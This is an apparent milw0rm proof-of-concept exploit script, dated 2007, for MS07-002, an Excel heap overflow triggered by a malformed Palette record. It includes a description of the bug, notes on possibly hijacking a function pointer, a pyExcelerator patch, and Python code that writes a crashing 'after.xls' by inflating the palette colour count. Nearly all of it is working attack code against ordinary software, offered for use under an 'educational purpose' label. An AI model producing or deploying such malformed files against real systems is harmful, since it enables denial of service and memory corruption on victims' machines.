"""
MS07-002 EXCEL Malformed Palette Record Vulnerability DOS POC

######
Author
######
LifeAsaGeek at gmail.com
... and Microsoft said that vuln credit is for Greg MacManus of iDefense Labs

########################
Vulnerablity Description
########################
Bound error occurs when parsing Palette Record and it causes Heap Overflow
check out here - http://picasaweb.google.com/lifeasageek/MS07002/photo?pli=1#5022146178204021506
   which is generated by DarunGrim
   ( and I want to say I'm not a person who made this analyzer ==; )

#############
Attack Vector
#############
Arbitary Data will be overwritten to the heap, but arbitary data is highly depends on the stack status !
Result of heap overflow, you can overwrite 2 bytes to restricted range address ( not anywhere )
In *CERTAIN* environment( such as open excel file which is already opened)
    you can catch the flow by modify function pointer, but it doesn't have a reliablity at all
Let me know if you have a good method to break down

######
Result
######
DOS

#####
Notes
#####
You should modify pyExcelerator module because it doesn't generate Palette Record

pyExcelerator diff results would be like below

diff h:\study\pyexcelerator-0.6.3a\pyExcelerator-0.6.3a\build\lib\pyExcelerator\BIFFRecords.py pyExcelerator\BIFFRecords.py
1104a1105,1108
>     def __init__(self):
>         BiffRecord.__init__(self)
>         self._rec_data = pack('<H', 0x0038) # number of colours
>         self._rec_data += 'A' * 0xe0
diff h:\study\pyexcelerator-0.6.3a\pyExcelerator-0.6.3a\build\lib\pyExcelerator\Workbook.py pyExcelerator\Workbook.py
468,469c468
<         result = ''
<         return result
---
>         return BIFFRecords.PaletteRecord().get()

!! THIS IS ONLY FOR EDUCATIONAL PURPOSE !!
 - 2007.01.25
"""

import sys, os
from struct import *
from pyExcelerator import *

def CreateXLS():
    w = Workbook()
    ws = w.add_sheet('MS07-002 POC')
    w.save( "before.xls")


def ModifyXLS():
    try:
        f = open( "before.xls", "rb")
    except:
     print "File Open Error ! "
     sys.exit(0)

    str = f.read()
    f.close()

    #write to malformed xls file
    f = open( "after.xls", "wb")

    PaletteRecord = pack( "<HHH", 0x0092, 0x00E2, 0x0038)
    NewPaletteRecord = pack( "<HHH", 0x0092, 0x00E2, 0x01FF)

    palette_idx = str.find( PaletteRecord)

    if palette_idx == -1:
     print "Cannot find Palette Record"
     sys.exit(0)

    str = str.replace( PaletteRecord, NewPaletteRecord)
    f.write( str)
    f.close()

if __name__ == "__main__":
    print "==========================================================="
    print "MS07-002 Malformed Palette Record vulnerability DOS POC "
    print "Create POC Excel File after.xls"
    print "by LifeAsaGeek at gmail.com"
    print "==========================================================="
    CreateXLS()
    ModifyXLS() 

# milw0rm.com [2007-01-25]